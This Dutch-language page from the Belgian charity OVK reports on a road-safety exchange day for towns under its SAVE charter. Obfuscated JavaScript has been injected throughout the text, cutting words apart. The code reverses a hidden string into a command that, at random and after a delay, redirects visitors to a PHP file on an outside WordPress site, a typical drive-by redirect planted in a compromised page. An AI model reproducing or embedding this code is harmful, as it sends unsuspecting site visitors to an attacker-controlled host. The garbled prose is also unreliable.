Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

SAVE-uitwisselingsdag, een succes!

Het project SAVE-charter Steden & Gemeenten van Ouders van Verongelukte Kinderen (OVK) is na vier jaar 69 geëngageerde, 44 ‘ondertekende’ en 9 gelabelde steden & gemeenten rijk.

Om het meeste te halen uit de talrijke good practices en om bovendien wat extra inspiratie en informatie mee te geven, nodigde OVK op woensdag 29 april alle deelnemende steden, gemeenten en politiezones (burgemeesters, schepenen, korpschefs, verantwoordelijke ambtenaren) uit voor de eerste SAVE-uitwisselingsdag.

Wat stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tond er precies op het programma?

  • Elke SAVE-stad of gemeente is anders maar toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch kunnen we veel leren van elkaar. Eens over het muurtje te kijken naar hoe anderen verkeersveiligheid aanpakken, kan heel inspirerend werken. Daarom getuigden Laarne, Ravels en de politiezone Voorkempen over hun SAVE-traject.
  • Helmut Paris (verkeerspsycholoog, departement Mobiliteit en Openbare Werken, afdeling beleid en verkeersveiligheid) nam daarna het woord. Hij gaf een vernieuwend perspectief op hoe steden & gemeenten kunnen omgaan met verkeersongevallen op hun grondgebied.
  • Daarop volgend waren er themasessies rond lokale verkeerseducatie (sprekers: Sofie Hoenkamp, Rondpunt vzw & Dirk Gabriëls, VSV) en fiets- en schoolstraten (spreker: Wout Baert, Fietsberaad).
  • 4 jaar SAVE Steden & Gemeenten wil zeggen: 4 jaar inspirerende voorbeelden. Als kers op de taart werd er voor deze uitwisselingsdag een SAVE-inspiratiegids ontwikkeld en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegelicht die enkele goede voorbeelden bundelt.
  • Daarna nam de stad Sint-Niklaas het woord. Zij brachten in beeld hoe zij kindvriendelijke publieke ruimte aangepakt hebben.
  • Het officiële slotwoord werd gegeven door de secretaris-generaal van het departement Mobiliteit en Openbare Werken, Filip Boelaert. Hij benadrukte nogmaals dat werken aan meer verkeersveiligheid een absolute toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topprioriteit is en moet blijven.

Bedankt aan iedereen die aanwezig was op deze SAVE-uitwisselingsdag. Het zien van zoveel enthousiasme, geeft enkel nog meer ‘goesting’ om voluit verder te werken aan een Vlaams ‘SAVE-landschap’.

De fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to’s zijn $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toalbum/?album=1&gallery=17″>hier te vinden.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be